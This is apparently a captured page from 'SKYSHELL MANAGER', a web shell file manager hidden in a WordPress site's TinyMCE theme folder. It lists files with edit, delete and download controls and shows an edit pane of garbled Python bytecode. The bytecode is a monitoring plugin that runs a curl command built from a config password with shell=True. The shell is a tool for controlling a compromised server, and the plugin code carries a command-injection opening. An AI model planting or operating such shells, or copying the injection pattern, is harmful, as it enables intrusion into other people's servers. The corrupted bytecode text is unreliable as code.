📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
15363.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: janus.cpython-36.pyc
3 ��ji� � @ s8 d dl Z d dlZG dd� de j�Zedkr4e� j� dS )� Nc @ s e Zd ZdZ dd� ZdS )�Plugin�janusc C sL |j dd�}tjd| d tjdd�}|j� d jd�jd d �}d|i}|S )Nr �adminpwz�curl -s -H "Accept: application/json" -H "Content-type: application/json" -X POST -d '{ "janus": "list_sessions", "transaction": "324", "admin_secret": "zC" }' http://localhost:7088/admin | awk 'NR>=5' | head -n -2 | wc -lT)�stdout�shellr zutf-8� � Zjanus_sessions)�get� subprocess�Popen�PIPE�communicate�decode�replace)�self�configr �p�res� r �?/root/tmp/pip-build-31b9end2/agent360/agent360/plugins/janus.py�run s z Plugin.runN)�__name__� __module__�__qualname__r r r r r r s r �__main__)Zpluginsr Z BasePluginr r �executer r r r �<module> s
Save